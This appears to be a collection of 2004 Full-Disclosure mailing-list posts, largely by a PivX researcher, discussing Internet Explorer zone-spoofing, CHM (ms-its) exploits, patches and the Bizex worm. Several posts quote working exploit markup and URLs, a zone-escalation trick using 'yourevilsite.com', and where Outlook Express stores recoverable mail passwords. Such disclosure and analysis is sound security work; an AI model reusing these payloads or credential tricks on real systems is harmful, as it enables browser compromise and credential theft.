From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Your subject makes it sound like this is a spoofing vulnerability when in fact this is expected functionality that has been around since Netscape 2 and IE3 which does not grant additional privileges of any kind and requires the user to activate WindowsUpdate from your site. Here's a quick and dirty demo injecting malware.com into windowsupdate.microsoft.com :) http://www.malware.com/targutted.html Your script opens a new window and then uses a timer to change the location of whatever window object has focus. This does not switch security zone or even protocol, all it does is to load your site into a subframe of another site. You can accomplish the exact same without trying to 'trick' anything by using the following 2 lines: W=window.open(http://v4.windowsupdate.microsoft.com;); W.frames[2].location.href = http://pivx.com/;; This is no different than loading WindowsUpdate in a frame on your own site. It has always been standard practice that you can change, but not read, the location of any window object to a site from the same protocol and security zone. A frame is a window object and all window objects are safely exposed because they by themselves does not reveal any information about the site inside the frame. You can get a handle of any window object to any depth because the frames collection is also safely exposed. This does not give you any kind of access to the document object inside, which would be necessary for any kind of code injection or cookie theft. Regards Thor Larholm Senior Security Researcher PivX Solutions 23 Corporate Plaza #280 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX.OB) Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Tuesday, June 29, 2004 11:41 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: SUPER SPOOF DELUXE Re: [Full-Disclosure] Microsoft and Security Thomas Kessler was kind enough to inform that this is not new, but in fact on old issue with Internet Explorer which by all accounts was supposed to be patched back in 1998[?]: Microsoft Security Program: Microsoft Security Bulletin (MS98- 020) Patch Available for 'Frame Spoof' Vulnerability http://www.microsoft.com/technet/security/bulletin/ms98-020.mspx Quite clearly this contraption known as Internet Explorer is just broken. It's oozing pus from every pore at this stage. If indeed the issues are the exact same. You'd better wipe hands of it anyway. We give up. -- http://www.malware.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: SUPER SPOOF DELUXE Re: [Full-Disclosure] Microsoft and Security
From: Pavel Kankovsky [mailto:[EMAIL PROTECTED] If a script from site A can replace the contents of a frame within a document from site B then site A is able to violate the *integrity* of B's contents. This is unacceptable. A script from site A can only replace the contents of a window object within a frame from site B if site B is specifically opened through scripting from site A. Site A cannot interact with any window object that it has not created itself, it has to open a new window, wait for it to load and then load a new document in the frame inside this new window. It doesn't even know if you already have an existing browser window pointing at WindowsUpdate or your banking site because it didn't open those windows. You have to look at the prerequisite attack scenario. You are surfing to some random site and out of nowhere it opens WellsFargo.com or WindowsUpdate. At this point you are thinking one of 2 things, either What the.. I didn't go to WindowsUpdate/WellsFargo .. Let me just close that window .. Damn popups or Hey how nice, WindowsUpdate/WellsFargo magically appeared in front of me and I didn't even intend to go there .. I was just surfing for porn .. Let me hurridly download some stuff from there and give it my account details Thor ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: COELACANTH: Phreak Phishing Expedition]
You can't replicate this with most other servers because the Host header is set to a non-existant site on most servers. Whenever IIS or Apache receives a request it will first locate the proper site based on the IP adress being used, after which it will lookup based on the Host header. In the case of e-gold, they have simply not specified a Host header for the IIS website that they configured. You can send a HTTP request to e-gold.com with Host: foobar and their site still comes up, even though you should only get their site with a header such as Host: e-gold.com or Host: www.e-gold.com. HTTP 1.1 requires the use of a Host header and it is bad practice to accept HTTP requests without a Host header that corresponds to a locally configured site. In most cases with IIS, this only happens if you are using the Default Website or explicitly has choosen to not specify a Host header for the site. You can specify multiple Host headers for a site so there is not much excuse not to do so. Whenever IE wants to send an HTTP request it first needs to determine what server to connect to. Because of the URL escaping IE disregards anything before the slash and equal sign, and sees that it has to send an HTTP request to www.e-gold.com. It is only after IE has determined what server to request information from that it URL decodes the URI and ends up with http://www.microsoft.com/redir=www.e-gold.com, which it then displays in the Address Bar and subsequently uses to determine what security zone it should use to render the HTML. IE only decides what security zone to use based on the Address Bar value after it has successfully downloaded all of the HTML (untill then it is in the Unknown Zone), at which point the URL decoding has long since happened. If you want to exploit this to serve content from your site in the security zone of another site, you will need to disregard the Host header being sent by the client. A perfect candidate you can use to gain additional privileges is WindowsUpdate.microsoft.com or oca.microsoft.com who are both in the Trusted Sites security zone on a default installation of Windows Server 2003 and Windows XP SP2. You should be able to use this to compromise Windows XP SP2 through Internet Explorer despite the My Computer zone hardening since the Trusted Sites Zone has all of the privileges you need to plant and execute a file. Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX) Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: Drew Copley [mailto:[EMAIL PROTECTED] Sent: Thursday, June 10, 2004 4:40 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Fwd: [Full-Disclosure] COELACANTH: Phreak Phishing Expedition] Subject: [Full-Disclosure] COELACANTH: Phreak Phishing Expedition From:[EMAIL PROTECTED] [EMAIL PROTECTED] Date:Thu, June 10, 2004 12:35 pm To: [EMAIL PROTECTED] -- Thursday, June 10, 2004 The following was presented by 'bitlance winter' of Japan today: a href=http://www.microsoft.com%2F redir=www.e- gold.comtest/a Quite inexplicable from these quarters. Perhaps someone with server 'knowledge' can examine it. It carries over the address into the address bar: [screen shot: http://www.malware.com/gosh.png 72KB] while redirecting to egold. The key being %2F without that it fails. The big question is where is the 'redir' and why is it only applicable [so far] to e-gold. Other sites don't work and e- gold is running an old Microsoft-IIS/4.0. IE makes this into a connection with e-gold.com like so: GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Host: www.microsoft.com/ redir=www.e-gold.com Connection: Keep-Alive It never touches microsoft.com. What is interesting, though, is IE spoofs the zone. If you change www.microsoft.com in there to a site in your trusted zone, you will see e-gold read as your trusted zone. So, you should be able to bounce from any trusted zone and theoritically from local zone -- and with adodb still being open, you should be able to run code because of the open adodb issue. IE doesn't talk to e-gold first. It connects to it. It sends the GET request, it receives the first page. But, can't replicate with other servers. It requires some more research. Working Example: http://www.malware.com/golly.html credit: 'bitlance winter
[Full-Disclosure] RE: COELACANTH: Phreak Phishing Expedition
You can't replicate this with most other servers because the Host header is set to a non-existant site on most servers. However, you can use this to gain both Trusted Sites and Intranet Sites privileges from arbitrary websites. Whenever IIS or Apache receives a request it will first locate the proper site based on the IP adress being used, after which it will lookup based on the Host header. In the case of e-gold, they have simply not specified a Host header for the IIS website that they configured. You can send a HTTP request to e-gold.com with Host: foobar and their site still comes up, even though you should only get their site with a header such as Host: e-gold.com or Host: www.e-gold.com. HTTP 1.1 requires the use of a Host header and it is bad practice to accept HTTP requests without a Host header that corresponds to a locally configured site. In most cases with IIS, this only happens if you are using the Default Website or explicitly has choosen to not specify a Host header for the site. You can specify multiple Host headers for a site so there is not much excuse not to do so. Whenever IE wants to send an HTTP request it first needs to determine what server to connect to. Because of the URL escaping IE disregards anything before the slash and equal sign, and sees that it has to send an HTTP request to www.e-gold.com. It is only after IE has determined what server to request information from that it URL decodes the URI and ends up with http://www.microsoft.com/redir=www.e-gold.com, which it then displays in the Address Bar and subsequently uses to determine what security zone it should use to render the HTML. IE only decides what security zone to use based on the Address Bar value after it has successfully downloaded all of the HTML (untill then it is in the Unknown Zone), at which point the URL decoding has long since happened. If you want to exploit this to serve content from your site in the security zone of another site, you will need to disregard the Host header being sent by the client. A perfect candidate you can use to gain additional privileges is WindowsUpdate.microsoft.com or oca.microsoft.com who are both in the Trusted Sites security zone on a default installation of Windows Server 2003 and Windows XP SP2. You should be able to use this to compromise Windows XP SP2 through Internet Explorer despite the My Computer zone hardening since the Trusted Sites Zone has all of the privileges you need to plant and execute a file. Other than gaining access to the Trusted Sites zone, you can further gain access to the execution privileges of the Local Intranet zone by explicitly leaving out a TLD (Top Level Domain) in the first part of the query. The following immediately gain Local Intranet privileges: http://whatever%3fredir=www.e-gold.com http://whatever%3fredir=yourevilsite.com Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX) Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: Drew Copley [mailto:[EMAIL PROTECTED] Sent: Thursday, June 10, 2004 4:40 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Fwd: [Full-Disclosure] COELACANTH: Phreak Phishing Expedition] Subject: [Full-Disclosure] COELACANTH: Phreak Phishing Expedition From:[EMAIL PROTECTED] [EMAIL PROTECTED] Date:Thu, June 10, 2004 12:35 pm To: [EMAIL PROTECTED] -- Thursday, June 10, 2004 The following was presented by 'bitlance winter' of Japan today: a href=http://www.microsoft.com%2F redir=www.e- gold.comtest/a Quite inexplicable from these quarters. Perhaps someone with server 'knowledge' can examine it. It carries over the address into the address bar: [screen shot: http://www.malware.com/gosh.png 72KB] while redirecting to egold. The key being %2F without that it fails. The big question is where is the 'redir' and why is it only applicable [so far] to e-gold. Other sites don't work and e- gold is running an old Microsoft-IIS/4.0. IE makes this into a connection with e-gold.com like so: GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Host: www.microsoft.com/ redir=www.e-gold.com Connection: Keep-Alive It never touches microsoft.com. What is interesting, though, is IE spoofs the zone. If you change www.microsoft.com in there to a site in your trusted zone, you will see e-gold read as your trusted
[Full-Disclosure] RE: Internet explorer .clsid vulnerability
This is actually a behavior that is part of Windows Explorer, not Internet Explorer. I think we have covered this in the past on lists as well. If it is not already documented somewhere it should be, as this is how Windows file queries (inside IE) are performed on the local file system. Basically, you must first circumvent security zone restrictions and gain access to execute HTML files from the local file system in the first place before this is an issue. At this time, it is much more interesting to use your newly gained privileges to plant an EXE file and execute it instead of just launching the already installed applications. When your HTML document is opened from the local file system, it's working directory is C:\DIR\test.html ( equivelant to the URL FILE://C:/DIR/test.html ). If you click on a link to XX from here or have it open automatically through an iframe, the browser asks for FILE://C:/DIR/XX ( XX through the FILE protocol from the C:/ host in the DIR directory ). In this case, we are asking the browser to retrieve FILE://C:/DIR/Roozbeh.{3E9BAF2D-7A79-11d2-9334-F875AE17}. IE queries HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints\C to see if the Host is known (btw, all temporary NetBIOS sessions are stored here as integers, my currently open share in the dirty network to \\someserver\c$ is labelled 6 instead of C). It then checks both HKCU and HKCR in order for instances of that GUID and eventually finds C:\PROGRA~1\NETMEE~1\conf.exe in HKCR\CLSID\{3E9BAF2D-7A79-11d2-9334-F875AE17}\LocalServer32\(Default ) which it then launches. You can see this entire registry brawl at http://jscript.dk/2004/5/clsid.regmon.log If you try to test your POC from an Internet or Intranet site you will see that the browser simply asks for a document on the server and in return gets a 404 Not Found. Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Stock symbol: (PIVX) Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. http://www.pivx.com/qwikfix -Original Message- From: roozbeh afrasiabi [mailto:[EMAIL PROTECTED] Sent: Thursday, May 20, 2004 3:52 PM To: [EMAIL PROTECTED] Subject: Internet explorer .clsid vulnerability snip a href=Roozbeh.{3E9BAF2D-7A79-11d2-9334-F875AE17}dose not exist!/a snip ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Locking up Internet Explorer
Any link in the form of //something has the current protocol prepended to it. If you are on a HTTP site such as http://microsoft.com and click on a link to //msdn.microsoft.com you are in reality making a request for http://msdn.microsoft.com /. used to use these links all over the place, to save some bytes I guess. The results by clicking on your link to //test/test depends on the security zone you are in. If you are in the Internet Zone you will be asking for http://test/test , if you are in the My Computer zone you will be asking for file://test/test which gets translated into \\test\test. Regards Thor -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Tue 5/11/2004 9:08 AM To: [EMAIL PROTECTED] Cc: Subject: [Full-Disclosure] Locking up Internet Explorer The following code creates a link that causes Microsoft Internet Explorer to lock up. Restarting IE is required after clicking on the link. A HREF=//test/testLock up Internet Explorer/A The form of the link just has to be //*/* as far as I tried it. The IE version I used was 6.0.2800.1106.xpsp2.030422-1633CO. CYA -- Sie haben neue Mails! - Die GMX Toolbar informiert Sie beim Surfen! Jetzt aktivieren unter http://www.gmx.net/info ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: MS04-011 Break SSL support in IE 6.0.3790.0 with Windows 2003
This is a functionality regression that has been around for some time. The weird part of the MS04-011 patch is that it only occurs on Windows 2003. KB261328: Cipher Strength Appears as 0-Bit in Internet Explorer http://support.microsoft.com/?kbid=261328 SYMPTOMS In Microsoft Internet Explorer, you may experience the following behaviors: When you click About Internet Explorer on the Help menu, the Cipher Strength value is 0-bit. -and- You cannot connect to and view Web pages on secure Web sites. CAUSE This behavior can occur if the Schannel.dll, Rsabase.dll, or Rsaenh.dll files are missing, damaged, or of the incorrect version. Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net -Original Message- From: Technoboy [mailto:[EMAIL PROTECTED] Sent: Friday, April 16, 2004 11:04 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] MS04-011 Break SSL support in IE 6.0.3790.0 with Windows 2003 Hello everyone, A warning to all Windows 2003 user, this happened on two machine who had the exact same software configuration but different hardware. After installing the latest set of patches from microsoft, I was unable to access sites using SSL, after some investigation it turned out that my IE Cipher strength was set to 0bit ... After lot of troubleshooting and tryout with the different solutions offered by Microsoft I decided to take a guess and uninstall the MS04-011 patch... Well, the problem solved itself, the IE Cipher Strength is now at 128 like it was before, I can now access sites using SSL, windowsupdate, msn, etc Weird ... Anyone experienced something similar, or its just me ? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] 4 new Microsoft patches to close 20 vulnerabilities
4 new Microsoft patches to close 20 vulnerabilities It's patch Tuesday in Redmond and this April we have seen the release of MS04-011, MS04-012, MS04-013 and MS04-014. Microsoft has given all of these patches an impact of Remote Code Execution and the affected software ranges from Windows 98 to Windows 2003 64-Bit Edition. If you use Windows you will have to patch, preferable today. This week will see a wide range of vulnerability advisories and exploit releases. The documented functionality changes are few and minor. Currently, these patches are not available on Windows Update (11:25AM pacific time), but I can only imagine that it is a matter of hours. They can be retrieved with MBSA, SMS and a wide range of patch management applications. The broad summary can be found at http://www.microsoft.com/technet/security/bulletin/winapr04.mspx Most of these vulnerabilities are new, but some of them are already known - as an example MS04-013 patches the massively exploited MHTML/CHM related vulnerabilities that was used by Ibiza, Bugbear.e and a wide range of trojans. In all, these 4 patches fix 20 vulnerabilities and replace 19 existing patches. MS04-011 LSASS Vulnerability - CAN-2003-0533 LDAP Vulnerability - CAN-2003-0663 PCT Vulnerability - CAN-2003-0719 Winlogon Vulnerability - CAN-2003-0806 Metafile Vulnerability - CAN-2003-0906 Help and Support Center Vulnerability - CAN-2003-0907 Utility Manager Vulnerability - CAN-2003-0908 Windows Management Vulnerability - CAN-2003-0909 Local Descriptor Table Vulnerability - CAN-2003-0910 H.323 Vulnerability* - CAN-2004-0117 Virtual DOS Machine Vulnerability - CAN-2004-0118 Negotiate SSP Vulnerability - CAN-2004-0119 SSL Vulnerability - CAN-2004-0120 ASN.1 Double Free Vulnerability - CAN-2004-0123 MS04-012 RPC Runtime Library Vulnerability - CAN-2003-0813 RPCSS Service Vulnerability - CAN-2004-0116 COM Internet Services (CIS) - RPC over HTTP Vulnerability - CAN-2003-0807 Object Identity Vulnerability - CAN-2004-0124 MS04-013 MHTML URL Processing Vulnerability - CAN-2004-0380 MS04-014 Jet Vulnerability - CAN-2004-0197 Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE exploit going around on irc
The MS03-032 Object Data vulnerability dealt with improper handling of HTA mime-types. What Niek forwarded is using the Ibiza CHM exploit that deals with improper privileges gained through the ms-its/ms-itss URL protocol handlers which is still unpatched. Roozbeh Afrasiabi on this and others: http://www.securityfocus.com/archive/1/358913/2004-03-26/2004-04-01/0 Drew Copley: http://www.securityfocus.com/archive/1/358914/2004-03-26/2004-04-01/0 My post in February: http://www.securityfocus.com/archive/1/355149/2004-02-24/2004-03-01/0 Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net -Original Message- From: David Jacoby [mailto:[EMAIL PROTECTED] Sent: Monday, April 05, 2004 11:38 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE exploit going around on irc I just found this information: http://securityresponse.symantec.com/avcenter/venc/data/download.tagdoor .html Download.Tagdoor is a group of Trojan horses that exploit the Internet Explorer Object Tag Vulnerability. (This is described in Microsoft Security Bulletin MS03-032. ) ((pewp)) On Mon, 2004-04-05 at 19:52, Niek Baakman wrote: Hi list, this thing's been going around on irc the last few days: www.divx.dc-hub.com (IE users don't click it!) check source: iframe src='loi.htm' width=0 height=0/iframe loi.htm contains: object data=ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm type=text/x-scriptlet/object LOI.CHM is attached Regards, Niek Baakman ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE exploit going around on irc
I'm sorry, I thought you were already aware of the text/x-scriptlet object variation of Ibiza which was exploited in the wild before Ibiza was even discussed on Bugtraq - I assumed you would catch my reference to this. Either way, this is still the ms-its/ms-itss CHM issue regardless of how you trigger it. My bad, I will elaborate further in the future so we can avoid discussing semantics. Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net -Original Message- From: Jelmer [mailto:[EMAIL PROTECTED] Sent: Tuesday, April 06, 2004 2:05 PM To: Thor Larholm; David Jacoby; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE exploit going around on irc What Niek forwarded is using the Ibiza CHM exploit that deals with improper privileges gained through the ms-its/ms-itss URL protocol handlers which is still unpatched. Bt wrong It's a variation of the ibiza exploit, the ibiza exploit didn't work on XP SP1, I know so because I checked at the time and yes this variation is still unpatched ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: new internet explorer exploit (was new worm)
Drew Copley already mentioned how this is the CHM exploit that the Ibiza exploit relied on. K-OTiK posted about this in http://www.securityfocus.com/archive/1/354447 and we posted details of the Ibiza CHM exploit a few weeks before then on the Unpatched mailing list ( http://unpatched.pivxlabs.com ). The Bizex worm also used Unpatched IE vulnerabilities as was detailed in http://www.securityfocus.com/archive/1/355149/2004-02-24/2004-03-01/0 Implementing proactive security measures such as locking down the My Computer zone prevents this from having an effect. Both of these issues were mitigated against months in advance with Qwik-Fix, which has just been released as Qwik-Fix Pro at the Gartner Symposium/Itxpo 2004 . http://www.pivx.com/press_releases/qwikfixpro_gartner.html Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net -Original Message- From: Void [mailto:[EMAIL PROTECTED] Sent: Monday, March 29, 2004 11:15 AM To: Jelmer; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: new internet explorer exploit (was new worm) Just wanted to add that Norton Anti-Virus 2004 will detect this exploit and pop up a warning, but also fails to halt its execution or protect the user in any way. Here is what it thinks it is: http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.explo it.6.html So there is some measure of warning, but no real protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Email legislation does not exist
From: Mike Barushok [mailto:[EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Backdoor not recognized by Kaspersky Then there is the 'rejection' problem. If the mail is not accepted, laws prohibit silently discarding it. I don't mean to be rude, but what laws are you referring to? The internet is a collection of private networks running on private property. What law dictates that I am forced to accept any email, or any single packet of any kind, on my machine? It's an old saying, but it rings true: My network, my machine, my rules. Though perhaps a bit simply put, Doc Searls and David Weinberger highlights this same issue on http://www.worldofends.com/. Do we really want email to be legislated as regular postal services are? If so, should we not then be prohibited to run non-approved email servers? Doesn't the concept of email legislation itself oppose the basic structure of the Internet, by imposing legislation on private property? We legislate other private property such as guns based on their inherent danger, should we assume that machines connected to the Internet are by definition insecure and regulate them? (I have CC'ed the SecLegal mailing list) Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Backdoor not recognized by Kaspersky
From: Larry Seltzer [mailto:[EMAIL PROTECTED] if you can read the users login credentials to his corporate mailserver you are far better off. Rather casually put. How would you do this? I've heard how Swen asks the user for their credentials, but if you know a general crack for obtaining them I'd say that's news. I wouldn't call it news, try googling for Outlook Express Password Recovery and you will find numerous commercial solutions that programmatically give you the password. It's stored in a key called Password2 under HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\0001 where 0001 is the account number. The same applies to Outlook and any other mail application that allows the user to store their password locally. Since POP3 and SMTP are plaintext protocols the login credentials need to be stored in a form that can have them decrypted. Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Fw: [Unpatched] The Bizex worm
We have all talked about how most viruses and worms that actually spread in the wild could have been written so much better by any one of us. I guess someone stepped forward and took the bait. Everything indicates that Bizex is a worm which was created as a hired job. It's primary purpose was to collect banking information and create an armie of zombie machines. To accomplish this, it exploited a range of vulnerabilities, the latest of which was published as recently as February 19th on the Bugtraq mailing list. The antivirus companies are finally starting to update their signatures, hours after Bizex has already infected between 50.000 and 100.000 machines (Kaspersky). Luckily, the main distribution sites have now been shut down which has halted the spread but left us with an armie of zombie machines waiting for new instructions on port 1534. New variants of Bizex are expected in the near future. Locking down the My Computer zone prevented Bizex from infecting a Windows system, a feature which is implemented as a demonstratory fix in the currently available Qwik-Fix beta ( www.qwik-fix.net ) and which Microsoft is also implementing in the upcomming Windows XP Service Pack 2, slated for release around June. More information about Bizex can be found at http://www.kaspersky.com/news.html?id=4277566 http://www.viruslist.com/eng/viruslist.html?id=1029528 http://securityresponse.symantec.com/avcenter/venc/data/w32.bizex.worm.h tml http://www.sophos.com/virusinfo/analyses/w32bizexa.html http://us.mcafee.com/virusInfo/default.asp?id=descriptionvirus_k=101044 Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net -Original Message- From: Thor Larholm Sent: Tuesday, February 24, 2004 5:31 PM To: Thor Larholm Subject: [Unpatched] The Bizex worm Dear Unpatched subscriber, Today a new worm was discovered in the wild, called Bizex. Employing a multilayered attack, spread and infection approach it spreads through several vulnerabilities and exploits in multiple technologies such as email attachments, ICQ instant messaging and HTTP web pages. Some of these vulnerabilities are without patches from the vendor, raising the level of potential damage. Kaspersky is currently labelling this a global epidemic with more than 50.000 infections just among ICQ users. Likewise, implementing multiple layers of defense can help mitigate the threat posed by multilayered worms such as Bizek. The currently available BETA version of Qwik-Fix completely protects against the Bizek worm by mitigating the impact of several vulnerabilities it relies on. You can download Qwik-Fix at http://www.qwik-fix.net/ Symantec has labelled this worm W32.Bizex.worm, but has not yet published any details about it. http://securityresponse.symantec.com/avcenter/venc/data/w32.bizex.worm.h tml PivX Solutions are currently researching the potential impact of Bizex as well as its data gathering intentions. Some of the vulnerabilities this worm is exploiting in its effort to spread are: Microsoft Java virtual machine class loader ICQ SCM local file planting Microsoft Help CHM vulnerabilities ADODB Stream Internet Explorer Shell Folders Interestingly, the shell folder vulnerability was only recently categorized as being a serious threat on February 19 in a post to the Bugtraq mailing list. This once again demonstrates how malicious criminals are more rapidly exploiting vulnerabilities as they are being announced. Our initial analysis has shown that this worm is trying to collect credit card details from unsuspecting users, masquerading itself as a statement from banks and online trading sites, such as Wells Fargo, E*TRADE, American Express, e-gold, Verisign and LLoydsTSB. It has been linked to websites that are anonymously registered to russian individuals, is appareantly created using Microsoft Visual Studio and installs a backdoor on compromised machines to be used by professional spammers. Kaspersky has released more details at http://www.kaspersky.com/news.html?id=4277566 We will keep you updated as more information is uncovered. Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Microsoft confirms source code leak
There has been discussions on this mailing list as well as others about a possible leak of Windows 2000 and Windows NT 4 source code. Microsoft has now confirmed these rumours to be true. http://www.komotv.com/stories/29778.htm Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: getting rid of outbreaks and spam
